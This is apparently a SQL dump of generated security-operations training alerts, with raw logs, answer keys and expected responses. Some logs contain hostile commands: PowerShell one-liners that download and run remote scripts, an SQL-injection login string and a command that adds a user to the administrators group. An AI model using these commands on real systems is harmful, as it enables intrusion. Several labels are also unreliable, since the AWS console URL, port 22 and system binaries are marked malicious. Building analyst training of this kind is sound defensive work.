commonly used by malware for C2 communication.\"}},{\"id\":\"artifact_5\",\"type\":\"port\",\"value\":\"22\",\"is_critical\":false,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"suspicious\",\"details\":\"Non-standard port 22 commonly used by malware for C2 communication.\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"High/Critical severity level; 15 failed login attempts detected\"}', 'Intermediate', 'SIEM', 1, 0, 'OT_ICS'),
(227, 'Unauthorized AWS Access Attempt Detected', 'high', 'AWS CloudTrail', 'An unauthorized login attempt was detected in AWS account using an anomalous IP address. IP address associated with known threat actor activities. This matches the MITRE ATT&CK technique for Valid Accounts (T1078).', 'Unauthorized Access', 'T1078', 1, 'New', NULL, '{\"eventVersion\":\"1.08\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"AIDAEXAMPLEUSER\",\"arn\":\"arn:aws:iam::123456789012:user/example_user\",\"accountId\":\"123456789012\",\"accessKeyId\":\"EXAMPLEKEYID\",\"userName\":\"example_user\"},\"eventTime\":\"2023-10-12T14:55:55Z\",\"eventSource\":\"signin.amazonaws.com\",\"eventName\":\"ConsoleLogin\",\"awsRegion\":\"us-east-1\",\"sourceIPAddress\":\"192.0.2.99\",\"userAgent\":\"Mozilla/5.0\",\"errorMessage\":\"Failed authentication\",\"requestParameters\":null,\"responseElements\":{\"ConsoleLogin\":\"Failure\"},\"additionalEventData\":{\"LoginTo\":\"https://console.aws.amazon.com/\",\"MobileVersion\":\"No\",\"MFAUsed\":\"No\"},\"eventID\":\"abcd1234-5678-90ab-cdef-EXAMPLE123456\",\"readOnly\":false,\"eventType\":\"AwsConsoleSignIn\",\"recipientAccountId\":\"123456789012\"}', '2025-12-25 05:00:07', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 192.0.2.99 reported 479 times for malicious activity. Abuse confidence score: 84%.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"123456789012\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"example_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"Failure\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_5\",\"type\":\"geolocation\",\"value\":\"us-east-1\",\"is_critical\":false,\"osint_result\":{\"source\":\"GeoIP Lookup\",\"verdict\":\"suspicious\",\"details\":\"Login from us-east-1 - unusual location for this user\'s typical access pattern.\"}},{\"id\":\"artifact_6\",\"type\":\"url\",\"value\":\"https://console.aws.amazon.com/\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan.io\",\"verdict\":\"malicious\",\"details\":\"URL hosts credential harvesting page mimicking legitimate login portal.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"unknown\",\"analysis_notes\":\"High/Critical severity level\"}', 'Intermediate', 'SIEM', 1, 0, 'OT_ICS'),
(228, 'Unauthorized Access Attempt on Web Application', 'high', 'web_application_firewall', 'Detected multiple SQL injection attempts from a single IP address. The requests aimed at exploiting vulnerabilities in the login form.', 'intrusion_attempt', 'T1190: Exploit Public-Facing Application', 1, 'New', NULL, '{\"timestamp\":\"2023-10-24T14:35:23Z\",\"waf_id\":\"waf-01\",\"client_ip\":\"192.168.5.87\",\"request_method\":\"POST\",\"requested_url\":\"/login\",\"http_version\":\"HTTP/1.1\",\"alert_trigger\":\"SQL_Injection_Detect\",\"request_headers\":{\"Host\":\"example.com\",\"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"Accept\":\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\"},\"request_body\":\"username=admin\' OR \'1\'=\'1\' -- &password=pwd123\",\"rule_id\":\"981245\",\"rule_message\":\"Possible SQL injection attack detected\"}', '2025-12-25 05:55:11', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.5.87\",\"is_critical\":true,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"internal\",\"details\":\"192.168.5.87 is a private/internal IP address (RFC 1918). This is an internal network address and cannot be looked up in external threat intelligence. Investigate internal logs for activity from this host.\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"57/94 security vendors flagged this domain as malicious.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"unknown\",\"analysis_notes\":\"High/Critical severity level\"}', 'Intermediate', 'SIEM', 1, 0, 'OT_ICS'),
(229, 'Suspicious PowerShell Script Executed', 'high', 'endpoint', 'A PowerShell script was executed with potentially malicious behavior, indicating possible PowerShell exploitation tactics.', 'process', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2023-10-25T14:22:11Z\",\"host\":\"DESKTOP-5GH7JAM\",\"user\":\"JohnDoe\",\"process_id\":4380,\"process_name\":\"powershell.exe\",\"cmdline\":\"powershell -NoP -NonI -W Hidden -Enc WnNvR... (encapsulated malicious command)\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"parent_process_id\":374,\"parent_process_name\":\"explorer.exe\",\"integrity_level\":\"Medium\",\"session_id\":2}', '2025-12-25 15:32:46', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"username\",\"value\":\"JohnDoe\",\"is_critical\":null,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":null,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"54/72 security vendors identified this file as malware.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"powershell.exe\",\"is_critical\":null,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"File exhibits behavior consistent with malware: persistence mechanisms, network callbacks, code injection.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"explorer.exe\",\"is_critical\":null,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"File exhibits behavior consistent with malware: persistence mechanisms, network callbacks, code injection.\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"High/Critical severity level; Alert type indicates malware/C2 activity; Alert type indicates suspicious script execution\"}', 'Intermediate', 'EDR', 1, 0, 'OT_ICS'),
(230, 'Suspicious Domain Name Resolution Detected', 'high', 'DNS Security', 'A DNS request was made to a domain known for distributing malware. This domain has been flagged in multiple threat intelligence databases.', 'Malware', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"event_type\":\"dns_query\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"victim-machine\",\"domain\":\"maliciousdomain.com\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2025-12-25 21:24:21', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 352 times for hosting malware distribution sites.\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Domain linked to multiple malware campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The domain and associated IP have been confirmed malicious through OSINT. Blocking the IP and isolating the host will prevent further compromise.\"}', 'Intermediate', 'TI', 1, 0, 'OT_ICS'),
(231, 'Suspicious PSExec Activity Detected on Internal Network', 'high', 'CrowdStrike', 'A suspicious PSExec process was initiated from an internal machine attempting lateral movement across the network. The source machine is exhibiting signs of compromise.', 'Lateral Movement', 'T1077', 1, 'New', NULL, '{\"timestamp\":\"2023-10-05T14:23:11Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"192.168.1.25\",\"username\":\"jdoe\",\"hostname\":\"CORP-WORKSTATION01\",\"file_hash\":\"ab56b4d92b40713acc5af89985d4b786\",\"process_name\":\"psexec.exe\"}', '2025-12-25 21:27:43', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address of source machine\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address of target machine\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"ab56b4d92b40713acc5af89985d4b786\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash observed in known malware campaigns\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Valid internal user account\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of PSExec and the malicious hash associated with known malware campaigns indicates a true positive for lateral movement within the network.\"}', 'Advanced', 'EDR', 1, 0, 'OT_ICS'),
(233, 'Phishing Attempt with Malicious URL', 'critical', 'Proofpoint', 'A phishing email was detected with a spoofed sender domain and a malicious URL intended to steal credentials.', 'Phishing', 'T1566', 1, 'Closed', 36, '{\"timestamp\":\"2023-10-01T09:15:30Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.22\",\"email_sender\":\"noreply@secure-bank.com\",\"url\":\"http://secure-bank.com/login\",\"username\":\"target_user\"}', '2025-12-26 09:43:56', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.22\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 500 times for hosting phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://secure-bank.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL associated with phishing attempts\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"noreply@secure-bank.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"EmailRep\",\"verdict\":\"suspicious\",\"details\":\"Domain recently registered with no reputation\"}}],\"expected_actions\":[\"block_ip\",\"block_url\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The phishing email contains a malicious URL that leads to a credential-stealing page.\"}', 'Advanced', 'NULL', 1, 0, NULL),
(234, 'Suspicious Lateral Movement Detected via PSExec', 'medium', 'Wazuh', 'An internal host used PSExec to connect to multiple internal machines, indicating potential lateral movement.', 'Lateral Movement', 'T1570', 1, 'New', NULL, '{\"timestamp\":\"2023-10-01T11:05:50Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.20\",\"dst_ip\":\"10.0.0.25\",\"username\":\"admin_user\",\"hostname\":\"server-02\"}', '2025-12-26 15:36:00', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Source IP is within internal network\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Destination IP is within internal network\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Admin account used for PSExec\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of PSExec by an admin account for lateral movement is suspicious and requires further investigation.\"}', 'Beginner', 'EDR', 1, 0, 'OT_ICS'),
(235, 'False Positive: High Volume Network Traffic Alert', 'low', 'Firewall', 'An unusual spike in network traffic was detected originating from a trusted internal server, initially suspected as data exfiltration.', 'Data Exfil', 'T1020', 0, 'New', NULL, '{\"timestamp\":\"2023-10-01T13:45:12Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"203.0.113.100\",\"username\":\"service_account\",\"hostname\":\"data-server\"}', '2025-12-26 19:45:34', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in routine backup operations\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"External IP involved in regular data backup\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"service_account\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Service account used for scheduled data transfer\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The alert was triggered by a scheduled backup process, not malicious activity.\"}', 'Beginner', 'NDR', 1, 0, 'FINANCE'),
(236, 'Unauthorized Access Attempt via Credential Brute Force Detected', 'high', 'Firewall', 'A high number of failed login attempts were detected from a single IP address. This is indicative of a brute force attack attempting to gain unauthorized access to the organization’s internal systems. See MITRE ATT&CK Technique T1110 for Brute Force examples.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2023-10-15T02:38:47Z\",\"source_ip\":\"192.0.2.45\",\"destination_ip\":\"203.0.113.5\",\"destination_port\":\"22\",\"event\":\"Failed login attempt\",\"username\":\"admin\",\"attempt_count\":150,\"device\":\"Firewall\",\"location\":\"New York, USA\",\"rule_triggered\":\"Brute Force Detection Policy\",\"log_id\":\"fw123456789\",\"session_id\":\"5d2b7c4f-e5c4-42b0-b5e1-d4f7e642b895\"}', '2025-12-26 05:00:04', '2026-01-11 01:09:19', NULL, 'Intermediate', 'SIEM', 1, 0, 'TECH'),
(237, 'Suspicious PowerShell Script Execution', 'high', 'process', 'A PowerShell script was executed with commands commonly associated with file-less malware activity.', 'Malicious Script Execution', 'T1086', 1, 'New', NULL, '{\"timestamp\":\"2023-11-01T14:23:05.123Z\",\"hostname\":\"DESKTOP-7GTB8K3\",\"user\":\"jdoe\",\"process_name\":\"powershell.exe\",\"pid\":4521,\"cmdline\":\"powershell.exe -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString(\'http://malicious.example.com/script.ps1\')\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"parent_process\":\"explorer.exe\",\"parent_pid\":3428,\"network_activity\":{\"url_accessed\":\"http://malicious.example.com/script.ps1\",\"resolved_ip\":\"192.0.2.123\"}}', '2025-12-26 05:41:40', '2026-01-11 01:09:19', '{\"correct_verdict\":\"True Positive\",\"triage_answer\":\"Suspicious\",\"containment_answer\":\"Isolate Host\",\"scenario\":{\"ip\":\"109.12.97.181\",\"files\":[{\"name\":\"unknown_tool.ps1\",\"type\":\"script\",\"status\":\"SUSPICIOUS\"}],\"email_subject\":null}}', 'Intermediate', 'EDR', 1, 0, 'GOVERNMENT'),
(238, 'Suspicious Admin Privilege Escalation Detected', 'high', 'process', 'A process was initiated to grant administrative privileges using a seldom used elevated command, indicating potential privilege escalation.', 'Privilege_Escalation', 'T1055 - Process Injection', 1, 'New', NULL, '{\"timestamp\":\"2023-10-23T14:35:29Z\",\"hostname\":\"finance-server-01\",\"username\":\"jdoe\",\"process_name\":\"cmd.exe\",\"cmdline\":\"cmd.exe /c net localgroup administrators jdoe /add\",\"file_hash\":\"8c7b59a2e13572bf7c147de025d3d02123f7988c\",\"pid\":2356,\"parent_process_name\":\"explorer.exe\",\"parent_pid\":1024,\"user_domain\":\"CORP\",\"event_id\":4678,\"source_ip\":\"192.168.5.10\"}', '2025-12-26 05:57:25', '2026-01-11 01:09:19', '{\"correct_verdict\":\"True Positive\",\"triage_answer\":\"Suspicious\",\"containment_answer\":\"Isolate Host\",\"scenario\":{\"ip\":\"32.46.140.23\",\"files\":[{\"name\":\"unknown_tool.ps1\",\"type\":\"script\",\"status\":\"SUSPICIOUS\"}],\"email_subject\":null}}', 'Intermediate', 'EDR', 1, 0, 'OT_ICS'),
(239, 'Suspicious Remote Code Execution Detected', 'high', 'Endpoint Protection', 'A potential remote code execution was detected on an endpoint, involving a suspicious PowerShell command executed via obfuscation tactics.', 'process', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2023-10-25T14:23:07Z\",\"endpoint_id\":\"WIN-7G8H9JKL01\",\"event_id\":4103,\"process_name\":\"powershell.exe\",\"cmdline\":\"powershell.exe -nop -w hidden -enc WwBTAFUAUgByAFIAXABfAGsAYgB5AHAANQBoAGYAMQBzAC0AaQBzAGMAbwBtAG0AYQBuAGQAXQB7AGU...\",\"integrity_level\":\"High\",\"parent_process\":{\"name\":\"explorer.exe\",\"pid\":4568},\"file_hash\":{\"md5\":\"3b3f6bf0277b2973ff07371d5c6efbff\",\"sha1\":\"42ebf3a68eee911d85c9d6041d3b8e4c4ecf6dd2\"},\"user\":\"DOMAIN\\\\jdoe\",\"network_activity\":{\"outbound\":true,\"destination_ip\":\"10.0.0.75\",\"destination_port\":80}}', '2025-12-26 05:44:53', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"25.133.105.171\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 25.133.105.171 reported 454 times for malicious activity. Abuse confidence score: 85%.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"system\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"suspicious_activity\"}', 'Intermediate', 'EDR', 1, 0, 'OT_ICS');
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`) VALUES
(240, 'Suspicious PowerShell Command Execution', 'medium', 'endpoint', 'A potentially malicious PowerShell script was executed on the endpoint. The script uses encoded command obfuscation techniques.', 'process', 'T1059.001', 0, 'Closed', 41, '{\"timestamp\":\"2023-10-10T14:32:58Z\",\"hostname\":\"Workstation-23\",\"username\":\"jane.doe\",\"process_name\":\"powershell.exe\",\"pid\":4567,\"parent_process\":\"explorer.exe\",\"ppid\":789,\"cmdline\":\"powershell.exe -NoProfile -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0AYQBnAGs\",\"file_hash\":\"3f50f0a35cc9b36fc3f0e1f2b0cf3a78\",\"user_domain\":\"CORP\",\"integrity_level\":\"High\",\"command_length\":43}', '2025-12-27 05:37:34', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"242.96.134.59\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP 242.96.134.59 has 0% abuse confidence score. Located in corporate network range.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"User accessed from known location during normal business hours. Activity consistent with role.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"suspicious_activity\"}', 'Beginner', 'NULL', 1, 0, NULL),
(241, 'Suspicious Command Execution Detected', 'medium', 'process', 'A suspicious command execution was detected involving base64 encoding of an unknown script.', 'Potential Obfuscation or Encoding', 'T1027 - Obfuscated Files or Information', 0, 'Closed', 41, '{\"timestamp\":\"2023-10-12T14:23:34Z\",\"hostname\":\"workstation-7F5D\",\"username\":\"j.doe\",\"process_name\":\"powershell.exe\",\"cmdline\":\"powershell -NoProfile -Command Invoke-Expression (New-Object Net.WebClient).DownloadString(\'http://malicious.example/script\')\",\"file_hash\":\"sha256:d8a1c4cbf1e1367c2c6fd589v71c4c6f2b3d8e56ab60dcd526bfed9f2b68be23\",\"parent_process_name\":\"explorer.exe\",\"parent_pid\":1020,\"pid\":3284,\"event_id\":4688,\"event_message\":\"A new process has been created\"}', '2025-12-27 05:01:40', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"100.56.249.171\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 100.56.249.171 reported 173 times for malicious activity. Abuse confidence score: 93%.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"suspicious_activity\"}', 'Beginner', 'NULL', 1, 0, NULL),
(242, 'Suspicious PowerShell Script Execution Detected', 'high', 'endpoint', 'A potentially malicious PowerShell script with obfuscated code has been executed on an endpoint.', 'Process Execution', 'T1059.001', 1, 'investigating', 41, '{\"timestamp\":\"2023-11-01T14:32:16Z\",\"hostname\":\"DESKTOP-7GTHB9K\",\"user\":\"jdoe\",\"process_name\":\"powershell.exe\",\"process_id\":2678,\"cmdline\":\"powershell.exe -NoP -NonI -W Hidden -E JABzAHQAcgAgAD0AIABOAGUAdwAtAE8AYgBqAGU... (truncated)\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"file_hash\":\"2B2B6D120897FBB5783C3F8DCF57DBBA\",\"parent_process\":\"explorer.exe\",\"parent_process_id\":1744,\"network_activity\":{\"dest_ip\":\"192.168.1.10\",\"dest_port\":80},\"registry_modifications\":{\"key\":\"HKCU\\\\Software\\\\Classes\\\\ms-settings\\\\shell\\\\open\\\\command\",\"value\":\"calc.exe\"}}', '2025-12-27 05:08:14', '2026-01-11 01:09:19', '{\"correct_verdict\":\"True Positive\",\"triage_answer\":\"Suspicious\",\"containment_answer\":\"Isolate Host\",\"scenario\":{\"ip\":\"162.113.139.213\",\"files\":[{\"name\":\"unknown_tool.ps1\",\"type\":\"script\",\"status\":\"SUSPICIOUS\"}],\"email_subject\":null}}', 'Intermediate', 'NULL', 1, 0, NULL),
(243, 'Critical RDP Brute Force Attack Detected', 'critical', 'Firewall', 'Multiple failed RDP login attempts were detected from a single external IP address, indicating a brute force attack. This pattern of behavior is consistent with tactics outlined in cybersecurity incidents, such as the worldwide brute force attacks on RDP services in 2021.', 'Brute Force', 'T1110', 1, 'investigating', NULL, '{\"timestamp\":\"2023-10-24T18:35:24Z\",\"src_ip\":\"192.168.1.25\",\"dest_ip\":\"10.0.0.4\",\"attempt_count\":45,\"usernames_attempted\":[\"admin\",\"guest\",\"user1\"],\"protocol\":\"RDP\",\"event\":\"Failed login attempt\",\"firewall_id\":\"fw-12345678\",\"region\":\"us-west-2\",\"request_id\":\"req-abc123\",\"message\":\"Login failed due to incorrect credentials\",\"related_events\":[{\"timestamp\":\"2023-10-24T18:32:03Z\",\"src_ip\":\"192.168.1.25\",\"event\":\"Login attempt\"},{\"timestamp\":\"2023-10-24T18:34:16Z\",\"src_ip\":\"192.168.1.25\",\"event\":\"Connection established\"}],\"geo_location\":{\"country\":\"Unknown\",\"region\":\"Unknown\"}}', '2025-12-27 05:00:06', '2026-01-11 01:09:19', NULL, 'Advanced', 'SIEM', 1, 0, 'OT_ICS'),
(244, 'Malware Detected on Endpoint via Suspicious Process Execution', 'high', 'CrowdStrike', 'A suspicious process execution was detected on an internal machine, indicating potential malware activity. The process was associated with a known malicious hash.', 'Malware', 'T1059', 1, 'investigating', 65, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":null,\"username\":\"jdoe\",\"hostname\":\"workstation-1\",\"file_hash\":\"3f5d2c7e1d4b8f9a6a7f8b2d3a4c5d6e\",\"process_name\":\"malicious.exe\"}', '2025-12-27 15:13:22', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected machine\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3f5d2c7e1d4b8f9a6a7f8b2d3a4c5d6e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash detected in multiple malware reports\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Valid internal user account\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The presence of a known malicious file hash on an internal machine, executed by a suspicious process, confirms this as a true malware incident.\"}', 'Intermediate', 'NULL', 1, 0, NULL),
(245, 'Malware Detected - Suspicious Process Execution', 'high', 'CrowdStrike', 'A suspicious executable was detected running on the host, potentially indicating malware activity. The process attempted to connect to a known malicious C2 server.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2023-10-05T14:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"203.0.113.5\",\"username\":\"jdoe\",\"hostname\":\"DESKTOP-1\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2025-12-29 00:07:31', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for C2 activity\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected as Trojan by 45 AV vendors\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The hash and external IP both have malicious indicators, confirming the detection of malware.\"}', 'Intermediate', 'EDR', 1, 0, 'OT_ICS'),
